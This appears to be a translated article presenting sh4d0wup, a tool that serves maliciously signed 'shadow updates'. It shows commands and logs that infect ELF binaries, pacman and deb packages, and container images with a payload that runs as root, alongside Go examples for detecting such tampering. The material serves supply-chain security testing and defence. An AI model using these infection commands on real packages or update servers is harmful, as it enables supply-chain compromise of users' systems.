sh4d0wup: A Powerful Signing-Key and Update Exploitation Framework
2023-05-26 10:07:31
Posted from: Guangxi

About sh4d0wup

Have you ever wondered whether the update you just downloaded is the same update everyone else received, or one that was built just for you? sh4d0wup is a framework for exploiting signing keys and update mechanisms; the name is a play on "shadow update".

A shadow update is an update that does not officially exist but carries a valid signature, so clients treat it as genuine. This happens when the signing key has leaked to an attacker, or when a release engineer with legitimate access to the key decides to misuse it.

sh4d0wup is essentially an HTTP/HTTPS update server that sits as a reverse proxy in front of the legitimate server and can infect and sign a range of package, file and code formats. Researchers can use it to test whether the update mechanism of their own systems holds up against this scenario.
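To make the shadow-update threat model concrete, here is an added Go example; it is not code from sh4d0wup or its author. It assumes a hypothetical Ed25519 release key generated at run time and uses constructed sample artifacts. A client that only verifies the signature accepts the targeted update, while a client that also compares the artifact digest with what an independent witness (a mirror, a transparency log, other clients) received rejects it:

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Update is what an update client downloads: the artifact bytes plus a
// detached signature made with the publisher's signing key.
type Update struct {
	Name      string
	Artifact  []byte
	Signature []byte
}

// Publisher holds the release signing key. In the shadow-update scenario this
// key has leaked (or its legitimate holder is malicious), so the attacker can
// sign arbitrary artifacts that clients will accept.
type Publisher struct {
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

// NewPublisher generates a fresh Ed25519 release key (hypothetical key, made per run).
func NewPublisher() (*Publisher, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Publisher{Pub: pub, priv: priv}, nil
}

// Release signs an artifact exactly the way a legitimate release would.
func (p *Publisher) Release(name string, artifact []byte) Update {
	return Update{Name: name, Artifact: artifact, Signature: ed25519.Sign(p.priv, artifact)}
}

// Digest is the identity an independent witness (a mirror, a transparency
// log, other clients) can publish for the artifact everyone else received.
func Digest(artifact []byte) string {
	sum := sha256.Sum256(artifact)
	return hex.EncodeToString(sum[:])
}

// VerifySignature is what a typical update client does: it only checks that
// the signature is valid under the key it trusts.
func VerifySignature(pub ed25519.PublicKey, u Update) bool {
	return ed25519.Verify(pub, u.Artifact, u.Signature)
}

// VerifyWithWitness also asks the question from the top of the article: is
// this the same artifact everyone else got? A targeted shadow update is signed
// correctly but has a digest no witness has seen.
func VerifyWithWitness(pub ed25519.PublicKey, u Update, witnessDigest string) bool {
	if !VerifySignature(pub, u) {
		return false
	}
	return Digest(u.Artifact) == witnessDigest
}

func main() {
	p, err := NewPublisher()
	if err != nil {
		panic(err)
	}
	// Constructed sample artifacts; they stand in for real package bytes.
	genuine := p.Release("tool-1.0", []byte("genuine build of tool 1.0"))
	// The attacker holds the same private key and serves this copy to one victim only.
	shadow := p.Release("tool-1.0", []byte("genuine build of tool 1.0 plus implant"))

	witness := Digest(genuine.Artifact) // what everyone else downloaded

	fmt.Println("genuine, signature only:", VerifySignature(p.Pub, genuine))           // true
	fmt.Println("shadow,  signature only:", VerifySignature(p.Pub, shadow))            // true: the client cannot tell
	fmt.Println("genuine, with witness:  ", VerifyWithWitness(p.Pub, genuine, witness)) // true
	fmt.Println("shadow,  with witness:  ", VerifyWithWitness(p.Pub, shadow, witness))  // false
}
```

The witness is simulated here by hashing the genuine artifact in-process; in practice the digest has to come from a second source fetched independently of the update server, otherwise the same reverse proxy can feed the client both the shadow update and a matching "witness" value.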

Download

Clone the project source with:

git clone https://github.com/kpcyrd/sh4d0wup.git

Building a plot

Some plots are fairly involved to run, so to avoid long setup times a plot can be built in advance, with its signatures generated ahead of time:

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Running a plot

The following command starts a malicious HTTP update server according to the plot configuration; the bait subcommand also accepts a plain YAML file instead of a prebuilt plot:

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

Example plot files shipped with the project:

contrib/plot-archlinux.yaml
contrib/plot-debian.yaml
contrib/plot-rustup.yaml
contrib/plot-curl-sh.yaml

Infecting a file

sh4d0wup infect elf

The infected binary runs the injected command (here `id`) and then continues into the original program, so `./a.out help` prints the id output followed by sh4d0wup's own help:

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO  sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO  sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
  bait         Start a malicious update server
  infect       High-level tampering: inject additional commands into a package
  tamper       Low-level tampering: patch a package database to add malicious packages, trigger updates or influence dependency resolution
  keygen       Generate signing keys with the given parameters
  sign         Use signing keys to generate signatures
  hsm          Interact with hardware signing keys
  build        Compile an attack based on a plot
  check        Check whether the plot can still be executed
  completions  Generate shell completions
  help         Print this message or the help of the given subcommand(s)

Options:
  -v, --verbose...  Increase logging output (can be used multiple times)
  -h, --help        Print help

sh4d0wup infect pacman

The --set flag bumps pkgver so pacman treats the result as an upgrade; the injected command is placed in an install hook and therefore runs as root during the transaction:

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO  sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size:  13.36 MiB
Net Upgrade Size:       0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring                                         [#######################################] 100%
(1/1) checking package integrity                                       [#######################################] 100%
(1/1) loading package files                                            [#######################################] 100%
(1/1) checking for file conflicts                                      [#######################################] 100%
(1/1) checking available disk space                                    [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup                                               [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

Here the Debian revision is bumped with --set Version=2.2.4-1 and the payload is patched into the control archive, so it runs as root from the maintainer script when the package is set up:

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO  sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
  apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
  ca-certificates
The following packages will be upgraded:
  apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...
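Both the pacman case ("adding one from scratch") and the deb case (patching control.tar.xz) work by adding an install hook so the payload runs as root. The following is an added Go example, not part of sh4d0wup, of the check a defender wants on the receiving side: parse a .deb (an ar container) and list its maintainer scripts, so the copy a server handed you can be compared with the one already in /var/cache/apt/archives. The sample package it builds is constructed in memory, and names such as InspectDeb and BuildSampleDeb are this example's own. It only handles gzip-compressed control archives; the log above shows control.tar.xz, which needs an xz decoder outside the Go standard library.

```go
package main

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"errors"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// The four dpkg maintainer scripts; a postinst runs as root right after unpacking.
var scriptNames = map[string]bool{"preinst": true, "postinst": true, "prerm": true, "postrm": true}

// readAr parses the "ar" container a .deb is made of: the "!<arch>\n" magic, then
// 60-byte member headers, each followed by member data padded to an even offset.
func readAr(data []byte) (map[string][]byte, error) {
	if !bytes.HasPrefix(data, []byte("!<arch>\n")) {
		return nil, errors.New("not an ar archive")
	}
	members := map[string][]byte{}
	for off := 8; off+60 <= len(data); {
		hdr := data[off : off+60]
		size, err := strconv.Atoi(strings.TrimSpace(string(hdr[48:58])))
		if string(hdr[58:60]) != "`\n" || err != nil || off+60+size > len(data) {
			return nil, errors.New("bad or truncated ar member")
		}
		members[strings.TrimRight(string(hdr[0:16]), " /")] = data[off+60 : off+60+size]
		off += 60 + size + size%2
	}
	return members, nil
}

// InspectDeb returns the maintainer scripts (name -> body) found in control.tar.gz. Real
// packages often ship control.tar.xz or .zst, which need a third-party decoder (not handled here).
func InspectDeb(deb []byte) (map[string]string, error) {
	members, err := readAr(deb)
	if err != nil {
		return nil, err
	}
	gz, err := gzip.NewReader(bytes.NewReader(members["control.tar.gz"]))
	if err != nil {
		return nil, fmt.Errorf("control.tar.gz: %w (xz/zst control archives are not handled here)", err)
	}
	tr, found := tar.NewReader(gz), map[string]string{}
	for h, err := tr.Next(); err != io.EOF; h, err = tr.Next() {
		if err != nil {
			return nil, err
		}
		if name := strings.TrimPrefix(h.Name, "./"); scriptNames[name] {
			body, err := io.ReadAll(tr)
			if err != nil {
				return nil, err
			}
			found[name] = string(body)
		}
	}
	return found, nil
}

// tarGz and arMember assemble a constructed sample .deb (not real package data).
func tarGz(files map[string]string) []byte {
	var buf bytes.Buffer
	gz := gzip.NewWriter(&buf)
	tw := tar.NewWriter(gz)
	for name, body := range files {
		tw.WriteHeader(&tar.Header{Name: "./" + name, Typeflag: tar.TypeReg, Mode: 0o755, Size: int64(len(body))})
		tw.Write([]byte(body))
	}
	tw.Close()
	gz.Close()
	return buf.Bytes()
}

func arMember(name string, body []byte) []byte {
	hdr := fmt.Sprintf("%-16s%-12d%-6d%-6d%-8s%-10d`\n", name, 0, 0, 0, "100644", len(body))
	return append(append([]byte(hdr), body...), bytes.Repeat([]byte("\n"), len(body)%2)...)
}

// BuildSampleDeb builds a minimal .deb; a non-empty payload adds a postinst that runs it as
// root at install time, which is what "infect deb -c id" adds to a real package.
func BuildSampleDeb(payload string) []byte {
	control := map[string]string{"control": "Package: demo\nVersion: 1.0-1\nArchitecture: all\nMaintainer: nobody\nDescription: constructed sample\n"}
	if payload != "" {
		control["postinst"] = "#!/bin/sh\nset -e\n" + payload + "\n"
	}
	var deb bytes.Buffer
	deb.WriteString("!<arch>\n")
	deb.Write(arMember("debian-binary", []byte("2.0\n")))
	deb.Write(arMember("control.tar.gz", tarGz(control)))
	deb.Write(arMember("data.tar.gz", tarGz(nil)))
	return deb.Bytes()
}

func main() {
	fmt.Println(InspectDeb(BuildSampleDeb("id")))
}
```

Run InspectDeb on the cached package and on the served one and diff the two maps: a package that gained a postinst it did not have before, or whose maintainer script changed while the version only moved from 2.2.4 to 2.2.4-1, is the signal. The same idea applies to the pacman case (the .install file inside the .pkg.tar.zst), but zstd is likewise outside the standard library.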

sh4d0wup infect oci

For container images the tool works on a saved image tarball: it adds a new filesystem layer carrying the payload, rewrites the manifest and retags the image, and the payload then runs before the container's own command:

% docker pull alpine:edge
% docker save alpine:edge > alpine-edge.tar
% sh4d0wup infect oci alpine-edge.tar infected.tar -c id -t infected:latest
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Original image is referencing config "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json": LayerConfig { config: Some(Config { user: Some(""), exposed_ports: None, env: Some(["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]), entrypoint: None, cmd: Some(["/bin/sh"]), volumes: None, working_dir: Some(""), labels: None, stop_signal: None }), rootfs: Some(RootFs { type: "layers", diff_ids: ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"] }), extra: {"container_config": Object {"AttachStderr": Bool(false), "AttachStdin": Bool(false), "AttachStdout": Bool(false), "Cmd": Array [String("/bin/sh"), String("-c"), String("#(nop) "), String("CMD [\"/bin/sh\"]")], "Domainname": String(""), "Entrypoint": Null, "Env": Array [String("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")], "Hostname": String("457781b778a4"), "Image": String("sha256:28d4c3ce9341a318d475e64365e47a34d5b9ba6c670bed35ce90b2402296ead6"), "Labels": Object {}, "OnBuild": Null, "OpenStdin": Bool(false), "StdinOnce": Bool(false), "Tty": Bool(false), "User": String(""), "Volumes": Null, "WorkingDir": String("")}, "architecture": String("amd64"), "created": String("2022-11-10T20:19:29.043621251Z"), "history": Array [Object {"created": String("2022-11-10T20:19:28.834390785Z"), "created_by": String("/bin/sh -c #(nop) ADD file:51c4407dc777648e8ebc8e124b05feb1807699ade513b6006a9a409f6b0f6f51 in / ")}, Object {"created": String("2022-11-10T20:19:29.043621251Z"), "created_by": String("/bin/sh -c #(nop)  CMD [\"/bin/sh\"]"), "empty_layer": Bool(true)}], "os": String("linux"), "docker_version": String("20.10.12"), "container": String("457781b778a449c9eac455ca1a18300a4041cb2b0d2d3f979460d19d7632ebf7")} }
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Creating new layer in image: "patched"
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Generating filesystem layer for payload: "id"
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Updating tags of image to ["infected:latest"]
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Writing modified manifest...
% docker load -i infected.tar
Loaded image: infected:latest
% docker run -it infected echo hello world
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
hello world
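An added Go example, not code from sh4d0wup, of the corresponding check for a saved image. The tool above appends a layer named "patched" and rewrites the manifest, so the audit cross-checks the three places a docker-save tarball lists layers: manifest.json, rootfs.diff_ids in the config, and the non-empty history entries, plus an optional allowlist of expected diff_ids. The base diff_id and the config filename are taken from the log above; the injected digest, the history text and the sample tarball are constructed, and names such as Audit and BuildSampleImage are this example's own.

```go
package main

import (
	"archive/tar"
	"bytes"
	"encoding/json"
	"fmt"
	"io"
)

type manifestEntry struct {
	Config   string   `json:"Config"`
	RepoTags []string `json:"RepoTags"`
	Layers   []string `json:"Layers"`
}

// imageConfig is the part of the image config we need: layer digests and build history.
type imageConfig struct {
	RootFS  struct{ DiffIDs []string `json:"diff_ids"` } `json:"rootfs"`
	History []struct{ EmptyLayer bool `json:"empty_layer"` } `json:"history"`
}

func readTar(data []byte) (map[string][]byte, error) {
	files, tr := map[string][]byte{}, tar.NewReader(bytes.NewReader(data))
	for h, err := tr.Next(); err != io.EOF; h, err = tr.Next() {
		if err != nil {
			return nil, err
		}
		if files[h.Name], err = io.ReadAll(tr); err != nil {
			return nil, err
		}
	}
	return files, nil
}

// Audit cross-checks the places a saved image lists its layers. A layer appended after the
// fact (what infect oci does) is a diff_id with no non-empty history entry behind it, unless
// the attacker forged history too, so treat this as a heuristic; known is an optional allowlist.
func Audit(tarball []byte, known map[string]bool) ([]string, error) {
	files, err := readTar(tarball)
	if err != nil {
		return nil, err
	}
	var manifests []manifestEntry
	if err := json.Unmarshal(files["manifest.json"], &manifests); err != nil {
		return nil, fmt.Errorf("manifest.json: %w", err)
	}
	var findings []string
	for _, m := range manifests {
		var cfg imageConfig
		if err := json.Unmarshal(files[m.Config], &cfg); err != nil {
			return nil, fmt.Errorf("%s: %w", m.Config, err)
		}
		nonEmpty := 0
		for _, h := range cfg.History {
			if !h.EmptyLayer {
				nonEmpty++
			}
		}
		ids := cfg.RootFS.DiffIDs
		if len(m.Layers) != len(ids) || nonEmpty != len(ids) {
			findings = append(findings, fmt.Sprintf("%v: %d layers in manifest, %d diff_ids, %d non-empty history entries", m.RepoTags, len(m.Layers), len(ids), nonEmpty))
		}
		for _, id := range ids {
			if known != nil && !known[id] {
				findings = append(findings, fmt.Sprintf("%v: layer %s is not in the expected set", m.RepoTags, id))
			}
		}
	}
	return findings, nil
}

// BaseDiffID and configName are taken from the infect oci log above; the injected digest is a placeholder.
const (
	BaseDiffID = "sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"
	configName = "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json"
)

// BuildSampleImage constructs a docker-save style tarball; injected=true appends a layer without a history entry.
func BuildSampleImage(injected bool) []byte {
	ids, layers := []string{BaseDiffID}, []string{"base/layer.tar"}
	if injected {
		ids, layers = append(ids, "sha256:0000000000000000000000000000000000000000000000000000000000000000"), append(layers, "patched/layer.tar")
	}
	cfgJSON, _ := json.Marshal(map[string]interface{}{"rootfs": map[string]interface{}{"type": "layers", "diff_ids": ids},
		"history": []map[string]interface{}{{"created_by": "ADD rootfs.tar.gz in /"}, {"created_by": "CMD [\"/bin/sh\"]", "empty_layer": true}}})
	manJSON, _ := json.Marshal([]manifestEntry{{Config: configName, RepoTags: []string{"alpine:edge"}, Layers: layers}})
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	for name, body := range map[string][]byte{"manifest.json": manJSON, configName: cfgJSON} {
		tw.WriteHeader(&tar.Header{Name: name, Typeflag: tar.TypeReg, Mode: 0o644, Size: int64(len(body))})
		tw.Write(body)
	}
	tw.Close()
	return buf.Bytes()
}

func main() {
	fmt.Println(Audit(BuildSampleImage(true), map[string]bool{BaseDiffID: true}))
}
```

Point Audit at the output of docker save. Because history can be forged alongside the extra layer, the durable defense is to pull images by digest (image@sha256:...) rather than by a tag that a shadow update can be served under.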

License

The project is developed and released under the GPL-3.0 open source license.

Project address

sh4d0wup: https://github.com/kpcyrd/sh4d0wup

Author: (not given). Please credit FreeBuf.COM when reprinting.

Tags: code signing, signatures, updates, software supply chain security